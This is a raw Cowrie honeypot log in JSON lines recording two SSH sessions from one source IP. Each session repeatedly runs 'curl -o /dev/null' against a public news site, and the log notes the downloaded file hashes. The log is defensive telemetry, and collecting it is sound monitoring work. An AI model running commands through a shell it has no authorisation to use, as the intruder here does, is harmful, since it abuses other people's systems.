{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.569479Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.570929Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.589605Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.593296Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.597585Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.602208Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.603462Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.614372Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.615879Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.628522Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.641246Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.642535Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.646803Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.655648Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.656943Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.678994Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.680263Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.696976Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.698165Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.710787Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.713643Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.721361Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.722544Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.733048Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.741843Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.743073Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.769733Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.771087Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.790995Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.792323Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.808570Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.810070Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.817132Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.830750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.831932Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.836396Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.840292Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.847840Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.848922Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.859668Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.871578Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.872749Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.878047Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.890720Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.894793Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.896241Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.897074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.922550Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.923944Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.924917Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.941843Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.943125Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.948525Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.950220Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.957071Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.968388Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.974710Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.977635Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.978713Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:07.997070Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:07.998128Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.046119Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.050618Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.054182Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.056939Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.058347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.064716Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.067828Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.070485Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.082248Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.083499Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.094104Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.103607Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.105460Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.123755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.124999Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.128765Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.141325Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.144664Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.145875Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
